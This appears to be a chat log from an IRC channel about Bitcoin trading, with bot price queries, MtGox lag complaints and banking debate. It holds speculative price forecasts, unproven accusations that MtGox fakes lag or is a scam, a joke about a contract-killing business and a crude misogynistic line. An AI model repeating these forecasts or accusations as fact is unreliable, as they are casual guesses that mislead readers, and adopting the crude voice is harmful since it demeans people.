^^^ LOLZ Apr 08 19:21:30 SOCGen analyst using tulip analogy Apr 08 19:21:38 but i don't know the formula. mp has his properietary one, smickles didn't release it too Apr 08 19:21:53 it is certainly derived from greeks Apr 08 19:22:56 [BTCTC] [PAJKA.BOND] 50 @ 0.1 = 5 BTC [-] Apr 08 19:23:38 the BCB is doing it's job i seems Apr 08 19:24:08 it* Apr 08 19:24:12 :D Apr 08 19:24:17 $avg Apr 08 19:24:20 thestringpuller: 172.58 Apr 08 19:25:14 watching video Apr 08 19:26:47 ;;ticker Apr 08 19:26:48 BTCUSD ticker | Best bid: 175.00000, Best ask: 176.00000, Bid-ask spread: 1.00000, Last trade: 175.00000, 24 hour volume: 97038.53628561, 24 hour low: 152.25000, 24 hour high: 194.90000, 24 hour vwap: 174.54363 Apr 08 19:27:18 buffering for ever Apr 08 19:27:20 argh Apr 08 19:27:28 let me know when you're all done watching it Apr 08 19:27:33 ;;asks 999999999999 Apr 08 19:27:34 There are currently 45540.708 bitcoins offered at or under 999999999999.0 USD, worth 1.42184431699e+12 USD in total. | Data vintage: 0.0295 seconds Apr 08 19:27:40 [BTCTC] [ASICMINER-PT] 1 @ 0.7889 BTC [+] Apr 08 19:27:56 still possibly 5000+ coins that might be sold into bids Apr 08 19:28:05 ;;market --sell 5000 Apr 08 19:28:05 A market order to sell 5000 bitcoins right now would net 836963.8067 USD and would take the last price down to 161.0000 USD, resulting in an average price of 167.3928 USD/BTC. | Data vintage: 32.2451 seconds Apr 08 19:28:59 -assets Apr 08 19:30:24 so 161 eh? Apr 08 19:30:30 sell now, buy low? Apr 08 19:30:48 ;;market --buy 5000 Apr 08 19:30:48 A market order to buy 5000 bitcoins right now would take 922755.3103 USD and would take the last price up to 193.9201 USD, resulting in an average price of 184.5511 USD/BTC. | Data vintage: 62.1115 seconds Apr 08 19:30:49 gox sucking major dick again Apr 08 19:30:53 ;;goxlag Apr 08 19:30:55 MtGox lag is 113.779906 seconds. During this time, light travels 0.228013657681 AU. You could have sent a bitcoin between Earth and Venus at their closest approach (0.254 AU). Apr 08 19:31:27 with this coxlag, it's too late Apr 08 19:31:37 by the time i get the sell in, it'll be at the lowest Apr 08 19:31:41 lol Apr 08 19:31:42 it appears that legit customers are ddos'ing the poor engine again Apr 08 19:32:01 ;;goxlag Apr 08 19:32:03 $avg Apr 08 19:32:06 ;;ticker Apr 08 19:32:07 MtGox lag is 147.167236 seconds. During this time, light travels 0.294921493178 AU. You could have sent a bitcoin approximately the distance covered by Voyager 1 in one month (0.2988 AU). Apr 08 19:32:07 lippoper: 174.38 Apr 08 19:32:08 BTCUSD ticker | Best bid: 173.00000, Best ask: 173.50000, Bid-ask spread: 0.50000, Last trade: 172.16000, 24 hour volume: 97038.53628561, 24 hour low: 152.25000, 24 hour high: 194.90000, 24 hour vwap: 174.54363 Apr 08 19:32:16 $avg Apr 08 19:32:21 thestringpuller: 174.38 Apr 08 19:32:26 gox blows... Apr 08 19:32:39 Okay woo that's better Apr 08 19:32:43 watching life in slow motion Apr 08 19:33:12 we're going back to 175 Apr 08 19:33:33 i mean 174 Apr 08 19:34:41 i mean 17.4 Apr 08 19:35:35 $avg Apr 08 19:35:37 lippoper: An error has occurred and has been logged. Please contact this bot's administrator for more information. Apr 08 19:35:44 hehe Apr 08 19:35:50 bot error Apr 08 19:35:55 ;;asks 9999999 Apr 08 19:35:56 There are currently 46302.391 bitcoins offered at or under 9999999.0 USD, worth 197897107.999 USD in total. | Data vintage: 64.0835 seconds Apr 08 19:36:04 could still fall under 170 Apr 08 19:36:18 you figured that from the asks just now? Apr 08 19:36:20 [BTCTC] [ASICMINER-PT] 1 @ 0.789 BTC [+] Apr 08 19:36:38 total coins for sale Apr 08 19:36:39 i knew i should've sold at 181, to buy back now Apr 08 19:36:46 it was 38000 this morning Apr 08 19:36:49 [BTCTC] [ASICMINER-PT] 1 @ 0.789 BTC [+] Apr 08 19:36:51 ;;bids 0 Apr 08 19:36:54 There are currently 31360932 bitcoins demanded at or over 0.0 USD, worth 10408947.2577 USD in total. | Data vintage: 0.0105 seconds Apr 08 19:37:08 and total usd was 11.5m Apr 08 19:37:18 so we are deflating Apr 08 19:37:19 but that's due to the price drop Apr 08 19:37:30 no Apr 08 19:37:50 just a weekend dip xD Apr 08 19:37:54 hehe Apr 08 19:38:01 they tend not to happen over the weekend latley Apr 08 19:38:05 thought it was calculating 31360932 * 173 vs 31360932 * 185 Apr 08 19:38:06 so it must be it Apr 08 19:38:13 ;;calc 31360932 * 171 Apr 08 19:38:13 5362719372 Apr 08 19:38:23 ;;calc 31360932 * 185 Apr 08 19:38:23 5801772420 Apr 08 19:39:24 fjf Apr 08 19:39:42 just some dudes looking to make a quick buck Apr 08 19:40:00 ;;market --sell 5000 Apr 08 19:40:02 A market order to sell 5000 bitcoins right now would net 829476.2546 USD and would take the last price down to 160.3793 USD, resulting in an average price of 165.8953 USD/BTC. | Data vintage: 0.0005 seconds Apr 08 19:40:26 ;;market --buy 5000 Apr 08 19:40:26 A market order to buy 5000 bitcoins right now would take 929727.7045 USD and would take the last price up to 193.9201 USD, resulting in an average price of 185.9455 USD/BTC. | Data vintage: 23.6669 seconds Apr 08 19:40:45 you sell that for $829,476 and buy back lower when others panic sell. Apr 08 19:40:59 ;;help Apr 08 19:40:59 The bot responds when you start a line with the ! character. A good starting point for exploring the bot is the !facts command. You can also visit the bot's website for a list of help topics and documentation: http://gribble.sourceforge.net/ Apr 08 19:41:39 I think it's plausable that mtgox fakes lag Apr 08 19:41:59 to help them time the market and make big profits themselves Apr 08 19:42:20 ;;market buy --usd 829,476 Apr 08 19:42:21 Error: '829,476' is not a valid floating point number. Apr 08 19:42:28 they could look x mins into the future Apr 08 19:42:30 ;;market buy --usd 829476 Apr 08 19:42:33 A market order to buy 829476.0000 USD worth of bitcoins right now would buy 4482.4317 bitcoins and would take the last price up to 192.0000 USD, resulting in an average price of 185.0504 USD/BTC. | Data vintage: 0.0003 seconds Apr 08 19:42:40 already coming back Apr 08 19:42:45 ;;ticker Apr 08 19:42:45 BTCUSD ticker | Best bid: 176.00000, Best ask: 178.90000, Bid-ask spread: 2.90000, Last trade: 178.90000, 24 hour volume: 97038.53628561, 24 hour low: 152.25000, 24 hour high: 194.90000, 24 hour vwap: 174.54363 Apr 08 19:42:55 wait Apr 08 19:43:19 ;;obip Apr 08 19:43:20 (obip ) -- Calculate the "order book implied price", by finding the weighted average price of coins BTC up and down from the spread. Apr 08 19:43:50 ;;nextretarget Apr 08 19:43:51 231839 Apr 08 19:43:59 ;;bcstats Apr 08 19:44:01 goxlag http://jezus.si:81/render/?title=Mtgox+Lag+-+1+hour&vtitle=Seconds&from=-1hour&width=500&height=250&until=now&areaMode=none&lineMode=connected&target=alias%28bitcoin.mtgox.lag%2C%22Mtgox_lag%22%29 Apr 08 19:44:01 ;;obip 165-195 Apr 08 19:44:01 Error: '165-195' is not a valid floating point number. Apr 08 19:44:02 Current Blocks: 230317 | Current Difficulty: 7672999.920164138 | Next Difficulty At Block: 231839 | Next Difficulty In: 1522 blocks | Next Difficulty In About: 1 week, 1 day, 21 hours, 36 minutes, and 50 seconds | Next Difficulty Estimate: 8894294.12027 | Estimated Percent Change: 15.91678 Apr 08 19:44:10 ;;obip 165 195 Apr 08 19:44:11 (obip ) -- Calculate the "order book implied price", by finding the weighted average price of coins BTC up and down from the spread. Apr 08 19:44:14 [BTCTC] [BTC-BOND] 15 @ 0.00995 = 0.1493 BTC [+] Apr 08 19:44:16 ;;obip 165 Apr 08 19:44:17 The weighted average price of BTC, 165.0 coins up and down from the spread, is 175.78545 USD. | Data vintage: 102.6372 seconds Apr 08 19:44:23 ;;obip 9999 Apr 08 19:44:25 The weighted average price of BTC, 9999.0 coins up and down from the spread, is 176.23661 USD. | Data vintage: 110.7134 seconds Apr 08 19:44:38 bitcoin-qt is a goddamn resource hog. Apr 08 19:44:42 ;;obip 99999 Apr 08 19:44:44 Error: The width provided extends past the edge of the order book. Please use a smaller width. Apr 08 19:44:53 ;;totalbc Apr 08 19:44:53 11007950.0 Apr 08 19:44:59 ;;asks 99999999999 Apr 08 19:44:59 There are currently 45919.694 bitcoins offered at or under 99999999999.0 USD, worth 124134955395.0 USD in total. | Data vintage: 14.5671 seconds Apr 08 19:45:06 ;;obip 45919 Apr 08 19:45:07 The weighted average price of BTC, 45919.0 coins up and down from the spread, is 596185.33923 USD. | Data vintage: 22.1521 seconds Apr 08 19:45:27 ;;obip 6 Apr 08 19:45:27 The weighted average price of BTC, 6.0 coins up and down from the spread, is 176.99167 USD. | Data vintage: 42.9386 seconds Apr 08 19:45:29 yea lol that doesnt mean aynthing Apr 08 19:45:44 ;;obip 1 Apr 08 19:45:45 The weighted average price of BTC, 1.0 coins up and down from the spread, is 177.00000 USD. | Data vintage: 60.2608 seconds Apr 08 19:46:17 but the ratio of all btc offered / usd offered went from 299 to 240 during this dip Apr 08 19:46:30 wait, usd/btc Apr 08 19:46:47 so i think what we're seeing is, an initial run up from lack of coins on the market over the weekend, then everyone scrambling to get coins into gox this morning, then selling Apr 08 19:47:01 ThickAsThieves; makes sense Apr 08 19:47:05 [BTCTC] [PAJKA.BOND] 1 @ 0.10289 BTC [+] Apr 08 19:47:40 makes sense Apr 08 19:47:55 (lulz) Apr 08 19:47:56 which puts our "real" price at about 169 Apr 08 19:48:11 butbutbut it's climbing again Apr 08 19:48:19 only reason it wouldnt dip that low is if sellers hold out and cause a nother dip later Apr 08 19:48:24 which would be prudent Apr 08 19:49:01 let bids build back up to 185 or so, then sell off again Apr 08 19:49:30 no lag! Apr 08 19:49:51 "prudent" Apr 08 19:50:11 how is it prudent for someone to sell these notionally-valued strings? Apr 08 19:50:28 well, for the past 3 months, its remained quite true that waiting to sell is prudent, no? Apr 08 19:50:44 lol bitcoinity rollercoaster Apr 08 19:50:57 yeah but who cares about the past three months Apr 08 19:51:03 this is disruptive fintech Apr 08 19:51:07 fuck everything nyah! Apr 08 19:51:17 no i get it Apr 08 19:51:27 disruptive fintech... i like the sound of that Apr 08 19:51:27 i'm just expressing disbelief at the sheer volume of idiots in the world Apr 08 19:51:59 you must be young Apr 08 19:52:04 I'm guessing we now have our range, 172-194. And we'll see a symmetric wedge develop within that, centered around the 183 price point, while another day of consolidation around this new price point occurs. Then the next leg-up. Apr 08 19:52:17 it is startling to see how quickly it's moving up... $500 ain't so far away anymore... Apr 08 19:52:24 ThickAsThieves - I'd agree fully your theory is what kick-started the run/sell-off. Apr 08 19:52:57 almost halfway Apr 08 19:53:01 all within a month Apr 08 19:53:06 weeeeeeeeeeeeeeeeee! price coaster! :D Apr 08 19:53:24 It is also true that much of the liquidity dynamics has to do with mt gox back office operations.... Apr 08 19:53:27 if you think about, you can call sellers and buyers idiots Apr 08 19:53:32 at this rate, in another month, it'll be $500 Apr 08 19:53:38 they are both too aggressive Apr 08 19:53:51 totes disagree Apr 08 19:53:55 thickasthieves Apr 08 19:54:08 well obv buyers will pay any price Apr 08 19:54:16 "pay" "price" Apr 08 19:54:16 so why sell into bids? Apr 08 19:54:30 us "buyers" need a decent place to store value Apr 08 19:54:39 yeah Apr 08 19:54:44 ok Apr 08 19:54:50 you need it NOW Apr 08 19:54:50 ? Apr 08 19:54:52 it literally does not matter at which price we put accrued value into the lockbox Apr 08 19:54:57 you need to classify "buyers" Apr 08 19:55:02 there are 2 types of buyers at least Apr 08 19:55:07 anyone not "playing" the market Apr 08 19:55:14 1 that is a consumer, actually exchanging USD to BTC to use it. Apr 08 19:55:17 everyone who wants to preserve capital Apr 08 19:55:23 and 2 an investor type, who hoards it to sell later. Apr 08 19:55:32 ;;goxlag Apr 08 19:55:33 MtGox lag is 143.77873 seconds. During this time, light travels 0.288130965093 AU. You could have sent a bitcoin approximately the distance covered by Voyager 1 in one month (0.2988 AU). Apr 08 19:55:51 people buying btc to use it are tiny slice of the pie Apr 08 19:55:58 http://trilema.com/2013/grave-concerns-re-mtgox/ Apr 08 19:56:08 if anyone's curious, i'm adding gox to the suspected scam list. Apr 08 19:57:06 LOL ^^ Apr 08 19:57:39 gross Apr 08 19:57:43 why can nobody run a business? Apr 08 19:57:59 how does one trip and fall into a ponzi scheme? Apr 08 19:58:05 hahaha Apr 08 19:58:16 i just want to work with grownups Apr 08 19:59:07 bitcoin can get a little too "lord of the flies" huh? Apr 08 19:59:25 heh Apr 08 19:59:33 we still got a ways to go to growunupland Apr 08 19:59:34 mp i truly hope you are wrong Apr 08 19:59:45 mircea_popescu does spend a disturbingly large amount of time talking shit, yes MJR Apr 08 19:59:48 but their behavior is questionable indeed Apr 08 19:59:51 look around...they are chasing piggy over there...scared of some monster Apr 08 20:00:09 ThickAsThieves maybe i am. i don't see it tho. Apr 08 20:00:15 fighting over a conch (is that the foundation, gavin, luke jr etc?) Apr 08 20:00:31 surprisingly apt for a flippant remark Apr 08 20:00:40 symbols over real things Apr 08 20:00:46 world has problem with this Apr 08 20:00:53 actually Apr 08 20:01:02 idiots have a problem with this. confusing real things for the symbols. Apr 08 20:01:11 and there are giant scads of idiots in the world. Apr 08 20:01:11 benkay: there is a lot to talk shit about...mircea calls a spade a spade...better to fix it than to be polite to it Apr 08 20:01:20 i just like poking at him, mjr Apr 08 20:01:21 if you are right, isnt this the equivalent of a draining hot wallet Apr 08 20:01:26 it's how i pretend i matter Apr 08 20:01:32 where it will just get worse and worse very quickly Apr 08 20:01:43 benkay: you matter, everyone here who is so entertaining and educational matters Apr 08 20:02:04 you flatter me, and that triggers alarm bells. Apr 08 20:02:06 guys...are you watching the price? we are climbing back up right now Apr 08 20:02:07 i guess they dont even need to be using fake btc to manipulate price at this point Apr 08 20:02:20 230s lag mjr_ Apr 08 20:02:24 oh i know Apr 08 20:02:27 we arent going anywhere Apr 08 20:02:29 this is vega as fuck Apr 08 20:02:35 "fake btc" Apr 08 20:02:37 and i love it Apr 08 20:02:37 make me cry Apr 08 20:02:54 this is like vega from street fighter II Apr 08 20:03:34 note to self: super hero cartoon tv show based on greek options symbols Apr 08 20:03:40 ThickAsThieves yes. Apr 08 20:03:53 my brother "Oh, and I sold a Skylander for $60. Bought it for $20, so screw your damn coins!" Apr 08 20:05:05 is anyone really any more trustworthy than Gox though? Apr 08 20:05:22 not saying they are trustworthy, so much as, is anyone? Apr 08 20:05:24 plenty of people. Apr 08 20:06:05 if majority market traffic moves to bitinstant, then they have same incentive to deceive Apr 08 20:06:08 mpex Apr 08 20:06:10 jurov Apr 08 20:06:11 smickles Apr 08 20:06:15 ThickAsThieves yeah, that's a problem. Apr 08 20:06:15 prob nanotube? Apr 08 20:06:23 i would trust nanotube yes. Apr 08 20:06:23 namworld Apr 08 20:06:26 none of them run currency exchanges Apr 08 20:06:37 evoorhees Apr 08 20:06:40 it's the worst business Apr 08 20:06:40 the list goes on Apr 08 20:06:45 it will attract the dumbest players Apr 08 20:06:51 someone should fix that. Apr 08 20:06:52 Ukto. He runs weexchange Apr 08 20:07:03 benkay eyah this is a problem. Apr 08 20:07:36 can't i just sell bitcoins to wells fargo? Apr 08 20:07:50 KRS1 told me that Apr 08 20:07:54 ;;seen krs1 Apr 08 20:07:54 krs1 was last seen in #bitcoin-assets 1 day, 2 hours, 5 minutes, and 15 seconds ago: then unF unF unF all night long buttsecks Apr 08 20:07:57 lol Apr 08 20:08:15 so MP, instead of losing XX,XXX btc on options due to being Gox'd, tighten the algo, and use the money to show em how its done Apr 08 20:08:33 with a real currency exchange Apr 08 20:09:01 yeah mircea_popescu distract yourself from the exchange Apr 08 20:09:16 the actual important part of the ecosystem Apr 08 20:09:18 i;m not making a fiat exchange Apr 08 20:09:25 i dont blame you Apr 08 20:09:25 come on Apr 08 20:09:36 ;ticker Apr 08 20:09:40 ;;ticker Apr 08 20:09:41 BTCUSD ticker | Best bid: 180.28900, Best ask: 186.10000, Bid-ask spread: 5.81100, Last trade: 186.10000, 24 hour volume: 100099.75681545, 24 hour low: 155.00000, 24 hour high: 194.90000, 24 hour vwap: 176.22978 Apr 08 20:10:47 banks should take over exchange biz in the US. Apr 08 20:11:12 assertion ^^ Apr 08 20:11:15 thoughts? Apr 08 20:11:40 ideally. Apr 08 20:11:42 we're trying to be decentralized Apr 08 20:11:54 but yeah, it would be nice if we could exchange money there for fiat Apr 08 20:12:08 err ^^ btc for fiat/money Apr 08 20:12:15 banks need to figure out how to do it profitably Apr 08 20:12:20 banks cant even make a decent online banking website] Apr 08 20:12:22 Fees Apr 08 20:12:28 nevermind sort out btc Apr 08 20:12:38 dude Apr 08 20:12:41 it's shifting bits around Apr 08 20:12:46 there is zero cost to it Apr 08 20:12:50 if they ask huge fees, street competition would spring immediately Apr 08 20:12:53 okay not zero Apr 08 20:12:55 but trivial Apr 08 20:12:56 anyway, for anyone curious about the old days : https://bitcointalk.org/index.php?topic=444.msg3866#msg3866 Apr 08 20:13:03 not trivial to banks Apr 08 20:13:03 [BTCTC] [ESECURITYSABTC] 1 @ 0.25103 BTC [-] Apr 08 20:13:04 shifting non reversible bits Apr 08 20:13:05 "https://mtgox.com/users/login?username=SmokeTooMuch&password=XXXXXXX Apr 08 20:13:05 what the fuck!?! use hashes for transmitting and saving passwords!!!!" Apr 08 20:13:05 shit should be a fucking account feature Apr 08 20:13:06 it's not like credit cards where you can;t legally compete with them Apr 08 20:13:10 [BTCTC] [ESECURITYSABTC] 5 @ 0.25102 = 1.2551 BTC [-] Apr 08 20:13:11 they hate spending money on IT Apr 08 20:13:36 i hate them Apr 08 20:13:43 i hate everyone who doesn't spend money on it Apr 08 20:14:10 nobody seems to understand that 2 nerds and 50k of server equipment will trash your competitors, if properly managed Apr 08 20:14:30 and venture capitalists are obsessed with new businesses Apr 08 20:14:33 not breaking old businesses Apr 08 20:14:41 and i get that, but at the same time i break things all day every day Apr 08 20:14:44 nerd cant "properly manage" much, as you can see Apr 08 20:14:56 2 nerds and a manager Apr 08 20:15:04 manager must be a nerd too Apr 08 20:15:09 dude Apr 08 20:15:12 get off me Apr 08 20:15:14 hehe Apr 08 20:15:14 nobody seems to understand that 2 nerds and 50k of server equipment will trash your competitors, if properly managed << i understand lol. Apr 08 20:15:18 i work in this space Apr 08 20:15:53 i have seen the damage that non technical managers can wreak on a team Apr 08 20:16:05 all i'm saying is banks never really caught up with tech Apr 08 20:16:10 i actually like team dynamics, which makes me a weird nerd. Apr 08 20:16:14 so its hard Apr 08 20:16:41 ;;asks 999999999 Apr 08 20:16:42 There are currently 46992.924 bitcoins offered at or under 999999999.0 USD, worth 3025256372.08 USD in total. | Data vintage: 78.1869 seconds Apr 08 20:16:44 mircea_popescu you built a 50m fiat-valued company in less than3 years Apr 08 20:16:58 i'm not exactly including you in the idiot bucket Apr 08 20:17:06 also you're like a gangster or something terrifying Apr 08 20:17:17 it's traditional thing. around here it is better, everything done electronically, in some banks you can send money using internet instantly anytime to other account in same bank Apr 08 20:17:29 i know! Apr 08 20:17:29 i do this! Apr 08 20:17:35 but still, interbank transfer, 1 day Apr 08 20:17:39 sepa 2 days Apr 08 20:17:41 get ready for another price dip Apr 08 20:17:42 hahaha Apr 08 20:17:44 in us Apr 08 20:17:45 5 days Apr 08 20:17:46 that's ridiculous Apr 08 20:17:54 fuck this country. Apr 08 20:17:59 i love it Apr 08 20:18:00 but fuck it Apr 08 20:18:02 sepa is next day wtf. Apr 08 20:18:29 maybe next day if they send it in the morning Apr 08 20:18:41 automate all of these things Apr 08 20:18:51 release yourself of the burden of wage slaves Apr 08 20:18:58 and the hr overhead to rule them Apr 08 20:18:59 ;;market --sell 1000 Apr 08 20:18:59 A market order to sell 1000 bitcoins right now would net 179856.6021 USD and would take the last price down to 178.0000 USD, resulting in an average price of 179.8566 USD/BTC. | Data vintage: 16.5092 seconds Apr 08 20:19:10 so do you guys think the price will crash before the 10th, that's when they discontinue the Mt.Gox redeemable codes. Apr 08 20:19:11 ? Apr 08 20:19:11 ;;market --sell 2000 Apr 08 20:19:11 A market order to sell 2000 bitcoins right now would net 356703.9257 USD and would take the last price down to 175.5200 USD, resulting in an average price of 178.3520 USD/BTC. | Data vintage: 28.5843 seconds Apr 08 20:19:12 benkay consider that even mpex/coinbr deposits aren't automated Apr 08 20:19:35 yeah that was a foolish statement Apr 08 20:19:42 and after that recent fork i'm not rushing to do sth Apr 08 20:20:07 here's a wack idea Apr 08 20:20:10 wacky* Apr 08 20:20:15 new mining pool Apr 08 20:20:22 funds go to rewriting hairball Apr 08 20:20:33 lippoper i doubt really. Apr 08 20:20:50 ;goxlag Apr 08 20:21:02 another way gox could leverage lag, Apr 08 20:21:11 just considering that there's still a huge queue to withdraw money Apr 08 20:21:11 is tell sell on outside exhanges Apr 08 20:21:16 is to sell on Apr 08 20:21:25 isn't there a chance a lot of people will transfer their BTC's out and find another way to exchange? Apr 08 20:21:39 once the codes are gone Apr 08 20:21:57 codes probably dont have major impact Apr 08 20:22:01 i dunno tho Apr 08 20:22:06 that if gox will allow much btc to be withdrawn. Apr 08 20:22:19 it's the only way to withdraw money if you're not verified Apr 08 20:22:34 you didn't read the article? Apr 08 20:22:35 money as in USD Apr 08 20:22:45 they now fuss with btc withdrawal, too Apr 08 20:22:58 argh Apr 08 20:23:00 i tell my friends to not use gox Apr 08 20:23:05 eat the higher fees elsewhere Apr 08 20:23:16 experience some modicum of safety Apr 08 20:23:23 heh Apr 08 20:23:32 generally, avoid single points of failure in your personal financial infrastructure Apr 08 20:23:53 cant really call any bitcoin establishment 'safe' Apr 08 20:24:00 [HAVELOCK] [VTX] 10 @ 0.3102 = 3.102 BTC [+] Apr 08 20:24:00 ofc not Apr 08 20:24:30 one can however reduce risk Apr 08 20:24:31 i guess betting on sdice is close, since its fast Apr 08 20:25:10 one of these days when btc is worth $400/each i'll bet it all on satoshi dice Apr 08 20:25:26 either come out richer or empty handed. Apr 08 20:25:43 just go to a real casino Apr 08 20:25:47 at least they have prostitutes Apr 08 20:25:47 no Apr 08 20:25:49 those are rigged Apr 08 20:25:51 lol Apr 08 20:25:59 [HAVELOCK] [VTX] 1 @ 0.31 BTC [-] Apr 08 20:26:04 so is dice Apr 08 20:26:10 ;;asks 9999999999 Apr 08 20:26:10 There are currently 48196.751 bitcoins offered at or under 9999999999.0 USD, worth 14035802498.9 USD in total. | Data vintage: 4.5039 seconds Apr 08 20:26:21 I don't think it is, is it? Apr 08 20:26:31 there's no difference between someone who says i will take your money and someone who says i will take your money Apr 08 20:26:42 a 98% chance of winning 1.004x return seems like a good bet Apr 08 20:26:45 no matter the statistical whatever Apr 08 20:26:54 don't bet Apr 08 20:26:57 make educated plays Apr 08 20:27:16 ;;calc .98 * 1.004 Apr 08 20:27:16 0.98392 Apr 08 20:27:16 the odds are better Apr 08 20:27:16 ok, please give me an example right now of an educated play Apr 08 20:27:17 seems not. Apr 08 20:27:22 (the bettors are odder) Apr 08 20:27:32 let's see Apr 08 20:27:48 a company that aggregates signed receipts for bitcoin purchases and publishes trust ratings for merchants Apr 08 20:28:01 a contract killing outfit Apr 08 20:28:32 you gave a very risky business idea and an illegal one. Apr 08 20:28:36 lol Apr 08 20:28:51 you obviously don't have the chops to make those plays thenm Apr 08 20:28:54 Might as well be a day trader ;-) Apr 08 20:28:58 lag has lagged out Apr 08 20:29:01 ;;goxlag Apr 08 20:29:02 may as well put it all on red Apr 08 20:29:04 MtGox lag is 46.885324 seconds. During this time, light travels 0.0939576643418 AU. You could have sent a bitcoin ten times between Saturn and Titan (0.0802 AU). Apr 08 20:29:08 agreed Apr 08 20:29:13 ;;bet red Apr 08 20:29:14 Error: "bet" is not a valid command. Apr 08 20:29:22 ;;roll Apr 08 20:29:22 Error: "roll" is not a valid command. Apr 08 20:29:26 why do you gamble? Apr 08 20:29:54 here's another easy, legal educated play Apr 08 20:29:54 more fun than digging ditches Apr 08 20:29:57 HOLD BITCOINS Apr 08 20:30:01 ;;genprob 2200 Apr 08 20:30:02 (genprob []) -- Calculate probability to generate a block using Mhps, in seconds, at current difficulty. If optional argument is provided, probability is for supplied difficulty. To provide the argument, a nested 'elapsed' command may be helpful. Apr 08 20:30:03 why not just buy sex? Apr 08 20:30:10 purchase fun? Apr 08 20:30:24 is that not what gambling is? Apr 08 20:30:33 ;;genprob 2200 1 Apr 08 20:30:34 The probability to generate a block at 2200.0 Mhps within 1 second, given difficulty of 7672999.92016, is 6.67571229407e-08 Apr 08 20:30:41 huh. Apr 08 20:30:51 okay philosophical question, why is gambling fun? Apr 08 20:30:56 ;;genprob 22000000 6000 Apr 08 20:30:57 The probability to generate a block at 22000000.0 Mhps within 1 hour, 40 minutes, and 0 seconds, given difficulty of 7672999.92016, is 0.981783500137 Apr 08 20:31:06 gamblers only please Apr 08 20:31:14 ;) Apr 08 20:31:18 the thrill of the ride ;-) Apr 08 20:31:31 i think it appeals for different reasons for some people Apr 08 20:31:53 ;;ticker Apr 08 20:31:54 BTCUSD ticker | Best bid: 183.87811, Best ask: 184.50000, Bid-ask spread: 0.62189, Last trade: 183.50000, 24 hour volume: 100167.85329295, 24 hour low: 155.00000, 24 hour high: 194.90000, 24 hour vwap: 176.66415 Apr 08 20:32:11 the excitement/anxiety/thrill of either making it big or just for the fucking fun of feeling alive Apr 08 20:33:11 the guy playing poker with millions of dollars is not really having sex with that fine blonde bitch standing over his shoulder.... he's having more fun with his millions. Bitches second, Money first. Apr 08 20:33:52 ;;tslb Apr 08 20:33:54 Time since last block: 13 minutes and 51 seconds Apr 08 20:34:11 ;interval Apr 08 20:34:15 ;;interval Apr 08 20:34:16 496.55172413793105 Apr 08 20:34:32 ;;calc 496.55172413793105 / 60 Apr 08 20:34:32 8.27586206897 Apr 08 20:34:35 [MPEX] [S.MPOE] 6400 @ 0.00065489 = 4.1913 BTC [+] Apr 08 20:34:36 [MPEX] [S.MPOE] 10590 @ 0.00065873 = 6.976 BTC [+] Apr 08 20:34:48 ;;calc (496.55172413793105 / 60) / 60 Apr 08 20:34:48 0.137931034483 Apr 08 20:35:26 is that 8 hours or 8 minutes Apr 08 20:35:27 lol Apr 08 20:35:54 ;;interval 10 Apr 08 20:35:54 (interval takes no arguments) -- Shows average interval, in seconds, between last 1000 blocks. Apr 08 20:36:00 [HAVELOCK] [SDICE] 5 @ 0.3095 = 1.5475 BTC [-] Apr 08 20:36:00 [HAVELOCK] [SDICE] 2 @ 0.3097 = 0.6194 BTC [+] Apr 08 20:36:02 [HAVELOCK] [SDICE] 8 @ 0.3099 = 2.4792 BTC [+] Apr 08 20:36:05 benkay, the answer is risk, risk is fun Apr 08 20:36:08 interval - show the average time between blocks, over the past 1000 blocks. If given optional integer argument, use that many blocks for the estimate. Apr 08 20:36:19 gribble: (interval takes no arguments) -- Shows average interval, in seconds, between last 1000 blocks. Apr 08 20:36:34 lies Apr 08 20:36:38 ;-) Apr 08 20:36:50 ;;ticker Apr 08 20:36:53 BTCUSD ticker | Best bid: 181.00000, Best ask: 182.40000, Bid-ask spread: 1.40000, Last trade: 182.40000, 24 hour volume: 100167.85329295, 24 hour low: 155.00000, 24 hour high: 194.90000, 24 hour vwap: 176.66415 Apr 08 20:37:08 ;;diffchange Apr 08 20:37:10 Estimated percent change in difficulty this period | 16.76214 % based on data since last change | 13.877 % based on data for last three days Apr 08 20:37:15 please take you conversations with gribble private, you are spamming the channel Apr 08 20:37:22 oh i can do that? Apr 08 20:37:28 thanks Apr 08 20:37:30 yes Apr 08 20:37:54 woo, thanks! Apr 08 20:38:56 mircea_popescu: what is this? https://blockchain.info/tx/cbe6bcc1578c03054b9fd7bcd5d374c683270b0e27ec1ce8389d4060b19c02a2 Apr 08 20:39:07 any IPOs on the horizon? Apr 08 20:39:09 you have same wallet for mpex and bitbet? Apr 08 20:39:44 that is a buncha bets. Apr 08 20:40:08 i see another possible behavior correlating with lag Apr 08 20:40:19 large ask wall moving downawrd Apr 08 20:40:26 was at 190 Apr 08 20:40:29 now at 188 Apr 08 20:40:47 could just be natural Apr 08 20:41:55 bots Apr 08 20:42:11 over the weekend there's some douche selling trading bots on reddit Apr 08 20:42:35 now there's a bunch of noobs making hundreds of transactions per minute Apr 08 20:43:58 heh Apr 08 20:44:01 capitalism! Apr 08 20:44:44 heh free market Apr 08 20:45:20 ;;goxlag Apr 08 20:45:21 MtGox lag is 0 seconds. During this time, light travels 0.0 AU. You could have sent a bitcoin ... nowhere, really (0 AU). Apr 08 20:45:26 now lets see if price falls Apr 08 20:45:33 nah, now it'll go up Apr 08 20:45:41 ;;asks 0 Apr 08 20:45:41 There are currently 0 bitcoins offered at or under 0.0 USD, worth 0.0 USD in total. | Data vintage: 39.3270 seconds Apr 08 20:45:46 ;;asks 999999999999 Apr 08 20:45:46 There are currently 47372.398 bitcoins offered at or under 999999999999.0 USD, worth 1.42184506191e+12 USD in total. | Data vintage: 44.4670 seconds Apr 08 20:45:57 wow Apr 08 20:46:22 goxlag is 0 but data vintage is 45 seconds? Apr 08 20:46:29 ghost lag Apr 08 20:46:41 lag lag Apr 08 20:46:43 ghost lag the whip! Apr 08 20:46:56 Data vintage: 92.6545 seconds Apr 08 20:47:06 ;;goxlag Apr 08 20:47:08 MtGox lag is 0.132764 seconds. During this time, light travels 0.0002660575695 AU. You could have sent a bitcoin to the other side of the Earth, along the surface (0.0001339 AU). Apr 08 20:47:13 ;;asks 99999999 Apr 08 20:47:14 There are currently 47348.68 bitcoins offered at or under 99999999.0 USD, worth 422305405.304 USD in total. | Data vintage: 5.2297 seconds Apr 08 20:47:15 so if no coinbase, no gox, how to get btc back to fiat? Apr 08 20:47:16 son i am confus. Apr 08 20:47:25 buy eve credits Apr 08 20:47:26 bitinstant Apr 08 20:47:29 sell for dollars Apr 08 20:47:33 craigslist Apr 08 20:47:41 179 Apr 08 20:47:42 ebay lolz Apr 08 20:49:32 actually Apr 08 20:49:36 you can buy 